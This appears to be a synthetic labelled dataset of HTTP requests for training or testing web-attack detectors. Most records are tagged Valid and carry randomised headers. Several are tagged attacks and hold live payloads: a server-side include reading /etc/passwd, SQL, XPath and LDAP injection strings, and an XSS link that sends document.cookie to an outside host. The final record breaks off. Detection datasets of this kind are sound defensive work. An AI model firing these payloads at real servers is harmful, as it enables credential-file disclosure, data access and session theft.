TE: gzip;q=0.6,trailers,gzip;q=0.6
Trailer: Connection
User-Agent: Mozilla/1.3 (compatible; nolrremiIc; Win 9x; trtl)
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 399x404
Via: HTTP/4.3 18.201.107.240:803, tsa/5.1 97.126.179.177:1, 8.9 129.114.161.238
Transfer-Encoding: ascr; aenpne=1gaw
Upgrade: ean/3.6, etEd/1.5
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 222.247.137.229
X-Serial-Number: 8538612066
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19724
Start - Id: 18734
class: Valid
GET /GwmsYY.home/tth0AalAqutiailCue/Nxsshu7XNSnrsea/e.w@WwEkJ@/ae2otimoeehIeyrli/eOmhV9/y33E4WvjrAktiFErs/nsorEs0Hsv85cyajst/m7WJformKT@dtX.php4?70E.2ls=wy&acecohdipf5=yowa&esx=sw9ha&qesaspdfo=5661&el6f55=t+ctash%3Ddformotita&3ZFupdate8xOwinnte=husttU&nee=sBitTDzE&KF8UupdateIwW@=%24ps&2itsarrodfAandO=sea&1@907zfJ=ssc&sJUjRl6yF2F=rgfZkFrE%40 HTTP/1.1
Host: 214.27.59.75
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 219.245.151.93
Cookie: t3nRh=ter9elsnotieajtq;lstuHEeettt=ecs~hepHeed4
Cookie2: $Version="0"
Date: Tue, 13 Apr 04 18:41:38 CET
ETag: W/"_i9m9Ff5XvwkCmAXuiU"
Expect: 9asis
From: envreer4@lEts7.gov
If-Modified-Since: Sat, 15 Mar 08 07:49:50 GMT
If-Unmodified-Since: Sat, 08 Jan 05 15:28:28 CET
If-Match: "t4pKbWSsiglQQk3yBv"
If-None-Match: "k3ldPy2Vy2xCfB0.f3BC"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.0
Pragma: geV='eslo9ht'
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: sz2e eMeiOH=aMoieim
Range: 43867-
Referer: /beah9ord/eado/heogpdre.php4
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 2.9; 42-kv; rv:5.7.3) Gecko/34961828
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 854x2880
Via: 3.9 120.27.22.67, 4.3 www.eipnhOp.png, 2.7 150.31.164.140
Transfer-Encoding: gzip
Upgrade: eerUce/9.6, x4atia/7.5
Warning: 283 96.43.133.65:48460 "eUam8fnoeiuksnontNn" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18734
Start - Id: 15696
class: Valid
GET /a2t3urpdol1o/eacotVaU0aatsirh/aiedt/cMsGh3X/cdeasoneusue/znurkhlrnoirttc/ik4rw/AtnstbeoS1oOt7etsai/UawPAYz9BF1/yGsZ2Am9DGc.jod0yP/r1eLthPtD4ai.mdb? HTTP/1.0
Host: 157.237.123.216
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: e-nOthnh1h;q=0.4, h3lm-t5tsra, itiimwto-hscGz;q=0.3, vyv-ypa;q=0.8, 0nr5-slsieteh;q=0.3
Cache-Control: only-if-cached
Client-ip: 165.238.234.97
Cookie: 2g=i;p0itscr=breti;lta0io=uPlz95h;eet=natrckTLnemu0;tifanmfiuf=1839
Cookie2: $Version="3"
Date: Thu, 23 Oct 08 23:54:19 UTC
ETag: "samVfN@3gxamAD1mi"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Mon, 22 Mar 04 07:20:59 UTC
If-Unmodified-Since: Sun, 15 May 05 09:47:47 CET
If-Match: *
If-None-Match: "UfAdEtto31ayJUFG"
If-Range: Tue, 16 Mar 04 10:43:01 GMT
Max-Forwards: 758
MIME-Version: 2.8
Pragma: 21='noono'
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: Basic c2kxRGk6bnQ1dG9vRQ==
Range: -2
Referer: /sohe/7nbeh/SU28/oswr/enhgoe.php
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/6.7 (Windows; U; WinNT 6.1; ee-0w; rv:7.4.2) Gecko/04757995
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8122x873
Via: 9.9 www.rlts1rim.tiff:501, 4.4 8.169.36.70, FTP/5.6 24.128.6.110:72629
Transfer-Encoding: compress
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 9307845835407773
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15696
Start - Id: 34403
class: Valid
PUT /3MGnenEcwf/j6gnbw/0OBx/tpD/fhrs/0MbomE.html? HTTP/1.1
Content-Length: 235
Content-Language: 9ezO
Content-Encoding: deflate
Content-Location: /tllzt/nisa/beoq/uhi3rF/bage3.nsf
Content-MD5: Ym1wYmJlYWxvcGI5WWhlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Nov 08 21:16:50 GMT
Last-Modified: Mon, 19 Nov 07 01:17:47 CET
Host: 44.136.11.146
Connection: thEbl
Accept: application/*, video/mpeg;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: ltsanht-l4rett, otnHbC-c;q=0.7, o-n;q=0.3, hht-tsRnrccr;q=0.2, pcs-tohyevsd
Cache-Control: no-store
Client-ip: 245.163.168.164
Cookie: Nq0ntbtrtktts=959;4ta=t9ee1/sh;roozq=itTrabE
Cookie2: $Version="007"
Date: Mon, 22 Mar 10 22:56:23 UTC
ETag: W/"CakYtXFWHASt5_IdbQ"
Expect: emswa
From: naoi@4aeadhtTt.gov
If-Modified-Since: Tue, 22 Sep 09 22:59:07 GMT
If-Unmodified-Since: Sat, 12 Apr 08 14:44:03 CET
If-Match: *
If-None-Match: "pj8.bFuakd4bbhBXl"
If-Range: Sun, 14 Mar 10 03:56:22 CET
Max-Forwards: 206
MIME-Version: 8.4
Pragma: c=dd4
Proxy-Authorization: Basic bmc4UWM6c3lFNGZt
Authorization: eiekI an2todvr=psset7
Range: -60,31-880618,-0430
Referer: http://ol72aEE.org/DgLk/liboatw.txt
TE: deflate
Trailer: Connection
User-Agent: Mozilla/0.4 (compatible; o13ehmh; SunOS sun4u; o0ll)
UA-CPU: StrongARM
UA-Disp: 8099,2582,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 995x932
Via: FTP/6.4 157.192.70.148:0, FTP/5.6 www.blsinxo.jpg, 0.2 www.Ngssh.gif
Transfer-Encoding: compress
Upgrade: uegc/4.0, wn9ad/1.0
Warning: 879 47.143.187.103 "PblmEe" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 212696659467412
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

tOfEYukegHf=gttjitdpZ&cicGi2t7=rRnRvSB&Onavn89qaa=reav esomaila&iCcmnqDttswusei=tfe&oe=e770&aon27s=AdaBE8ajdfgSo&Bden84Nu=758878&abon5nh=rcpneniwindow.openfrom&itostpvnusAo=85021&ai4tmnbYo7=an1e5Nclscript sst&ucc9it=Ie)insert&run=102

End - Id: 34403
Start - Id: 18365
class: Valid
GET /7owhTarjcy4cqtI/qdHT86ePP5e/7toOO/eBZ1O@_Y_6wU/eGp38UIaa/cO.cgi?retoens1e0nea=92834&e1upebrt=hj06n&saa=esneS6cnnD&yei0t=f%5Dscript%3E8l&tEi=955243&ciaiod=aimceT0%7EnRlE&e6yMydesECi1=338&pliT=ue2nspnbwstc&mB6iBHITdF_=602804 HTTP/1.0
Host: www.89cnus7a.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=55
Client-ip: 134.170.146.150
Cookie: 2php6wherej8optK=rDbEMmY;uAFr=497;oruostty=sdxnwnigdFcoiframeobjecti;t1tnsnnekz7rym=18;slsrqy=2;seqMe=0sercpets7
Cookie2: $Version="08"
Date: Sat, 20 Jan 07 02:41:04 GMT
ETag: "BS3PvFTUfyAP50o@j"
Expect: 100-continue
From: laeeuer@lnsmToe.com
If-Modified-Since: Sun, 29 Nov 09 08:58:45 UTC
If-Unmodified-Since: Tue, 14 Apr 09 22:22:14 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Apr 08 12:37:19 GMT
Max-Forwards: 0341
MIME-Version: 8.0
Pragma: Tiigrs=ieTlnbg
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.ececa.net/0rtpimiq/sbebaan.php4
Range: 28-346200
Referer: http://tuih.de/iRlvaiij/xstaa3/sebv/tohkiie.zip
TE: trailers,trailers
Trailer: If-Match
User-Agent: arhEe/4.8
UA-CPU: x86
UA-Disp: 7961,862,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0744x394
Via: 9.3 www.sfdRit.gif:2031, 4.7 68.54.245.179
Transfer-Encoding: identity
Upgrade: yall3l/4.3, iae/4.2, Pto/9.7, 2de/8.3
Warning: 327 www.ssy4b.css "mrattncm6eh4fs" "Sat, 06 Nov 04 23:26:06 CET"
X-Forwarded-For: 45.200.167.86
X-Serial-Number: 185669982950
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18365
Start - Id: 23643
class: Valid
GET /1WIKUY/LVATPtMM/bES.DXwVi.swf?w6afvh3rXxsy=aAbHhsheeuhtcoh9&ach=isw%5Ddia7fa&roanzagTwit=gQkByao&Sq9YY6lformMVK=agdreBT&ab9=8 HTTP/1.0
Host: 225.4.7.229
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: edoyA-t;q=0.3, nSt48-QuacS;q=0.2, o8c-c;q=0.5
Cache-Control: no-transform
Client-ip: 151.102.247.154
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="1"
Date: Thu, 17 Feb 05 06:27:37 GMT
ETag: "XIQI_03OH24JNGEZ"
Expect: 100-continue
From: 91yr@3eph1.it
If-Modified-Since: Fri, 10 Dec 04 11:39:37 CET
If-Unmodified-Since: Sun, 20 Nov 05 19:10:27 UTC
If-Match: "8HbkwbvAQm_NFiCy"
If-None-Match: "SzZ69tEb_F2u5Wi@tPV"
If-Range: "9HFiDYn4a8njrE_DI."
Max-Forwards: 193
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: Basic aDVvdnl0OkVzaXJh
Range: 13344-7165,79151-
Referer: /Dereyap/8oaucU7i.asp
TE: chunked
Trailer: Referer
User-Agent: Mozilla/2.9 (X11; U; Unix 3.3; ia-pS; rv:8.2.1) Gecko/43452999
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 361x375
Via: 9.0 179.213.124.72
Transfer-Encoding: gzip
Upgrade: eqa/3.4, 6rIn/9.3
Warning: 121 www.uloio.gif "dae4cslezep1pcddhxee" "Fri, 17 Dec 04 20:23:59 GMT"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23643
Start - Id: 4854
class: Valid
POST /dDxUC_IQQMF.KvJyj8az.htm? HTTP/1.1
Content-Length: 13
Content-Language: mncHf,g
Content-Encoding: deflate
Content-Location: /4fo7hadA/lun4h9tt/a6Nn.bin
Content-MD5: cnNyaHRiN282NGVlaWpjaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Jan 05 16:37:46 CET
Last-Modified: Sat, 24 Jun 06 08:58:21 GMT
Host: 155.182.24.195
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aibse-TJioTo;q=0.0, teot8ebi-m1yenpo;q=0.3, lbltsr-q;q=0.8, n-tiron;q=0.0, tcapden-sir
Cache-Control: no-cache
Client-ip: 163.60.165.26
Cookie: 8KKw5b=3hlgog(+Re5x
Cookie2: $Version="16"
Date: Tue, 28 Sep 04 12:57:56 UTC
ETag: "q0j_.QPQiNvZ5COOw"
Expect: 100-continue
From: se9x4ani@iircstnutn.gov
If-Modified-Since: Tue, 22 Nov 05 07:12:55 CET
If-Unmodified-Since: Mon, 22 Aug 05 08:43:40 UTC
If-Match: "Z2XQjixZf._28Qg-qNVx"
If-None-Match: *
If-Range: Thu, 20 Mar 08 18:36:57 CET
Max-Forwards: 6917
MIME-Version: 8.6
Pragma: ah='mnodca'
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Digest algorithm=yantsSR
Range: -636874,7776-
Referer: http://www.yeehy.it/nplm/updtl.php4
TE: trailers,gzip;q=0.1
Trailer: Trailer
User-Agent: xw5brmgsa1/3.6.5.4.0
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 931x5037
Via: 3.1 7.96.167.71, 3.9 www.lnhemh.htm:86873, 2.3 217.19.209.253
Transfer-Encoding: gzip
Upgrade: tai/1.2, etrTcE/8.4, bsyg/5.1, coEs/1.6
Warning: 091 www.ve9ajra.gif "5hatsaitInswuanhdaEe" "Fri, 20 Jun 08 21:51:13 CET"
X-Forwarded-For: 119.68.107.192
X-Serial-Number: 688276935690
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3soeo=2984590

End - Id: 4854
Start - Id: 39779
class: SSI
GET /rtuwenionel/lttedortdt/eD8almaez/hOCf/lDluKxd/4NEP7Min/tckN9Ypnc/oag27hnll/c7tisynUeuiaYh3nAd/ccvbscriptKLObf/mdvyrthasT3aitoffl/ohaentsnttntlnlmler.nsf?kantlD=25&ezlancnvbre=+enT&emTdnthqiooawis=tx2nettani&tge5irO7eefAlz=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&lQqJ9andzF=0dtn%40wtbot&dosHUNvzol=ithmgo9st6hjcolsan HTTP/1.0
Host: www.ieId.it
Connection: nwh5m
Accept: */*
Accept-Charset: x-mac-japanese;q=0.1, ks_c_5601-1987;q=0.9, iso-2022-jp, macintosh
Accept-Encoding: identity, identity, identity;q=0.4, gzip;q=0.9
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 211.6.11.10
Cookie: tgsmaeceuaenrd=dgr
Cookie2: $Version="35"
Date: Wed, 17 Nov 04 20:45:29 UTC
ETag: W/"DTt6JelSuwDXAPxr"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Sun, 03 Dec 06 09:21:24 CET
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: "Z3npkwj.LoKh@3Dm"
If-Range: Tue, 04 Aug 09 15:24:28 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: ulerr='xdFetH'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Basic a0h0MGVuMjQ6ZndUbnVnbg==
Range: 2208-72
Referer: /htitgn.txt
TE: gzip;q=0.8,deflate,trailers
Trailer: Trailer
User-Agent: tnssTst7eS/3.5.4.4
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 5.2 www.ao19r.css:266, 4.4 159.209.116.197:34
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39779
Start - Id: 2809
class: Valid
GET /eUjc1v0xb.oyid/4JFhudWExzO.axKj@RV/56oqqmasocwhdnh1Ei/elntda0llpoekt/88umyu9NjXPwjkXpPyXU/ostRi/yahhad0ceO/uiswtsrdetsnaaeual/K2jmetaXX7ZipH2B/rLwTW-WY.e8VhMw1_/E3/nihimnarperey.png? HTTP/1.1
Host: www.fha6dn.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 161.229.249.9
Cookie: ANdWfT=afdx4zn;atthroeatbi=Elformdrr;5eed=iep;fyiclzrt=0720236147;seyqA=lma
Cookie2: $Version="0"
Date: Sun, 26 Sep 04 12:08:45 UTC
ETag: "m7IJo_S-76ZKUca4Re"
Expect: hnromb=Iuntaozw;e8Tf
From: iReicda@4nt3rlflA.st
If-Modified-Since: Mon, 13 Apr 09 09:40:20 GMT
If-Unmodified-Since: Thu, 29 Jul 04 14:18:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Aug 09 13:53:59 UTC
Max-Forwards: 560
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: Basic bHRFdXQ6cnc4dXQ=
Range: 653260-,8-79,061108-10
Referer: /sTfl7scn/Tn6i/dsntAdo.php3
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: BrTealorrd/5.4.0.9
UA-CPU: Sparc
UA-Disp: 2675,465,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 620x373
Via: 5.3 www.mhocA.jpg, 4.1 www.ceaoi.js:6644, 6.0 www.iiosAnv.htm
Transfer-Encoding: compress
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2809
Start - Id: 42503
class: SqlInjection
GET /topfri8serin.jpeg?evhsimditha=Tsqhilhd8Bbs&aV1=m0ttuu3xirklxfeo&nrweclcmeulk=hK1gqN-i8w&rts=90437&io8h=%27++OR++++%27odoiu3o4tt%27+++++BETWEEN++%27R%27++AND+++%27T HTTP/1.0
Host: 174.141.82.100:44442
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, utf-8;q=0.6, windows-1258
Accept-Encoding: 
Accept-Language: ydeArsi-rbi5kCrf, wuid-0r5oj;q=0.4, iadgr-7odcso
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="85"
Date: Fri, 16 Apr 10 20:12:12 GMT
ETag: W/"Meb@PuEcS0MSg5w"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 24 Mar 08 23:46:09 CET
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: *
If-Range: *
Max-Forwards: 546
MIME-Version: 9.9
Pragma: n73wWo=Otd2do
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: /cAfwa/tiirlnad/hadonT/yi4mdSdn.swf
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: oenieemlN/4.5.5
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.8 60.84.224.245, 8.7 www.R4qe5Eio.gif, 4.7 www.3eod.js
Transfer-Encoding: tn9ac
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42503
Start - Id: 35468
class: XPathInjection
GET /na8hismteae/o7eo/qLo_P/4HaG9/essVuQ/V6ZNylyV/h40theLpn/qFdLCz@wesCaqNGS/te4Resadcsees90t/edU79/hdeleteYT.php4? HTTP/1.1
Host: www.illahtyHs.st:06
Connection: ite3sTv
Accept: */*;q=0.2
Accept-Charset: windows-1250, x-mac-ce;q=0.3, x-mac-arabic
Accept-Encoding: 
Accept-Language: trorot-oveYDth5
Cache-Control: no-transform
Cookie: ttiia=n6t 1asi
Date: Wed, 11 Jun 08 14:25:27 CET
ETag: "dFInZO7AAV.iTnAMyce"
Expect: miaNLadt=haay
From: stma@chhsenn.cz
If-Unmodified-Since: Fri, 12 Mar 04 21:46:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 02
Pragma: sifA='92ie'
Referer: /mmu7ass.cfm
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: unrc0icy' or    count( path/child::node()[position(  )=((   i   +    j   +k    + l+  1)]  |    path/child::*()[position()=(k+1)])=1  or  'siurai'=' jriss'   or
UA-CPU: StrongARM
Transfer-Encoding: identity
Warning: 214 130.149.199.193 "0gtys7qown" 

null

End - Id: 35468
Start - Id: 47044
class: XSS
GET /3N.Sl/drWSFW3uimcmdZZt/wkK/cngg/euOtreAIgtas7eimim/iunXnM1nISt9Ke3rB/4attdaaje3t/sosqkeeedasoerboetEl/bc0SjQdy1npL/ttCDuKHi/fMi7N_.FF/sDH6qsjnY_FxB2ca.js?td4a=%3Clink++rel+%3D+++%22+++++stylesheet++%22+href%3D+++%22++++javascript%3A+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.maenla.com%2Fcgi-bin%2Fnsndla.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&shJaedwiits5we=s7J&of=34087&hedalee9saRTh=belebsbaNo&k2ieN4end7r2xr=%27eteybo9e&lRoofeeeod5ds=615 HTTP/1.0
Host: 36.15.196.38:80
Connection: p1iNst
Accept: image/*;q=0.0, audio/*;q=0.8, video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=93118
Client-ip: 182.170.20.121
Cookie: 7feHhslsireW=sovrhf Tuombalrd;ioo=09044;t8f2ro5ao=azdwi
Cookie2: $Version="9"
Date: Sun, 15 Feb 04 05:25:26 GMT
ETag: W/"ZuWdza31fuAokGFJWS"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Mon, 20 Dec 04 22:30:59 UTC
If-Unmodified-Since: Tue, 29 Aug 06 20:32:36 GMT
If-Match: "ihOluy_eWK7PW5T"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: /emuTan.php4
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.9 (X11; U; Linux i586 6.5; ms-1o; rv:9.3.3) Gecko/90971974
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 4.1 www.oinsnu.js, FTP/9.7 56.150.162.79:6411
Transfer-Encoding: gzip
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47044
Start - Id: 37123
class: LdapInjection
GET /eeoq/qzwMYoLPufH/wFg4NvLiWeM/e1MihORmArJxe91i37XL/4hnfQzwyIS/uaFBVzsock_streammEzu/spPvwi1Z.F6X/embB0LrfcMSvTu/F4winnt1zZI6iC0perlQ/odaetenrmrqnMhtnr44o.pl?Zde5P4AIz=04%29%28%26%28objectClass%3Du9n%29%28%7C%28sn+%3D+++mbe%29%28cn%3Dder+J*%29%29&tsirhooGeToeH=w2erehh8i&e5tNony=rfiAnw&mn4ace=diAi&nn2a8wtl=a HTTP/1.0
Host: 152.209.114.221
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, deflate;q=0.8, deflate, identity;q=0.2, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.97.57.216
Cookie: q484DL=qiajdsIydto&mh;eiNxohr7TrnlCl=23;rFUroosgt8=erzaagr4ohuyR;tnidOirUrAtwys=rEIpF
Cookie2: $Version="74"
Date: Fri, 17 Jul 09 08:17:42 UTC
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 31 Jul 06 20:06:49 GMT
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: *
If-None-Match: "PwNiLDk7mW.wcwNJk"
If-Range: Tue, 06 May 08 14:13:30 UTC
Max-Forwards: 1380
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: http://www.aomsy2m.biz/aHUVsd/ieue/leomah.dll
TE: trailers
Trailer: Accept-Language
User-Agent: ufiast9JycPte
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/1.5 www.Uoscidn.htm, t4li/2.0 202.230.184.254:4
Transfer-Encoding: cEha
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37123
Start - Id: 13776
class: Valid
GET /tDoyS7r/dhl9ynwp9otrTesn/vMTTaS/ij_RlZLKBSKPGVj/n1eCoh2M6kmJ/nlhrue/gdhn0t/r06fV2/hd65.gif?eHsfe9t=hb3&eeoolyIsatl0yaf=hsock_streamenryct&ptq=btaaeri4y6nTghe3ir&Basu8liaMmeu=taao&gM1s1metal=4hzanp9yh&ht=atN&Serne7tz=nrod%2B HTTP/1.1
Host: 122.249.20.147
Connection: uRre
Accept: */*
Accept-Charset: iso-8859-4;q=0.7, windows-1257, cp-936;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: 5eejt1ro-oqyd;q=0.1, nqAzlrer-ohr;q=0.1, se-efnw
Cache-Control: max-age=95691
Client-ip: 133.173.34.181
Cookie: gpitIrcdl=9113;LWzjA=reeR2z;at8kaetO=R@l
Cookie2: $Version="6"
Date: Thu, 05 May 05 13:09:40 GMT
ETag: "I3IwuIkVu8xUtNBWX"
Expect: Iarrwr=xhnQaptl;slhU=88n7sn
From: kaat@losa.de
If-Modified-Since: Wed, 11 Feb 09 13:28:52 GMT
If-Unmodified-Since: Sat, 10 Apr 04 18:53:22 UTC
If-Match: "4vKeg58Biq7vsEc8xP7"
If-None-Match: *
If-Range: Tue, 31 Oct 06 10:38:02 CET
Max-Forwards: 9305
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic bG85eW5sbGw6b2Zpc2Q=
Authorization: Digest uri=http://www.nai4r.uk/eesiurt.pl
Range: 681-4576,7-
Referer: http://www.mteely.be/obaIlitO/odarnr.exe
TE: deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 0.5; u8-gg; rv:1.0.6) Gecko/07010559
UA-CPU: x86
UA-Disp: 722,0517,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 609x411
Via: 4.8 www.c3etttDd.js, tN94w/7.8 192.247.86.246:2
Transfer-Encoding: deflate
Upgrade: Oiesa/5.8, 9pi/5.8
Warning: 339 195.225.149.64 "rr2e" 
X-Forwarded-For: 235.235.43.82
X-Serial-Number: 26172268
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13776
Start - Id: 34481
class: Valid
POST /ehsgEi2erdE/dNSC0c.shtml? HTTP/1.1
Content-Length: 87
Content-Language: ries,ndOdpd,coly
Content-Encoding: identity
Content-Location: http://www.iEleueke.be/y9Lr/Umrafa.fgf
Content-MD5: QTRseWNlZ25SdHVzdGRpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Mar 09 23:49:27 GMT
Last-Modified: Sun, 05 Jul 09 03:55:05 GMT
Host: www.ege2.it:22
Connection: close
Accept: application/rtf, text/*
Accept-Charset: x-mac-arabic;q=0.2, shift_jis, windows-1252;q=0.7, iso-8859-5, macintosh;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 146.138.230.160
Cookie: tdtoeuowNgde3=425659;teEe19tnamE=848921383;tJu4a=qekds96smeee6;eiatlsjj=fea
Cookie2: $Version="26"
